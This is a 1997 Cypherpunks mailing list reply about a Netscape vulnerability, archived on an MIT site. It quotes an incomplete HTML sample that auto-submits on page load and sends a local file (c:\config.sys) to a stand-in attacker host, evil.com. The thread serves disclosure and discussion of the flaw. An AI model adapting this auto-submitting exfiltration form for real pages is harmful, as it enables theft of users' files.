[82678] in Cypherpunks

home help back first fref pref prev next nref lref last post

Re: Netscape Exploit

daemon@ATHENA.MIT.EDU (Anonymous)
Wed Jul 2 00:46:00 1997

Date: Wed, 2 Jul 1997 05:50:31 +0200 (MET DST)
To: cypherpunks@toad.com
From: nobody@replay.com (Anonymous)
Reply-To: nobody@replay.com (Anonymous)

> >Here is a sample it isn't complete but you get the basic idea of what is
> >going on
> ><HTML><HEAD><TITLE>Evil-DOT-COM Homepage</TITLE><HEAD>
> >
> ><BODY onLoad="daForm.submit()">
> ><FORM
> >	NAME="daForm"
> >	ACTION="http://evil.com/cgi-bin/formmail.pl"
> >	METHOD=POST>
> >
> ><INPUT TYPE=FILE VALUE="c:\config.sys" Name="Save This Document on your
> >Harddrive">
> ><INPUT TYPE=HIDDEN NAME="recipient" value="foobar@evil.com">
> >
> >and so on and so forth...

So if someone was using Netscape to read mail, and I included a small bit
of HTML like the above, I could snarf up files out of everywhere?




home help back first fref pref prev next nref lref last post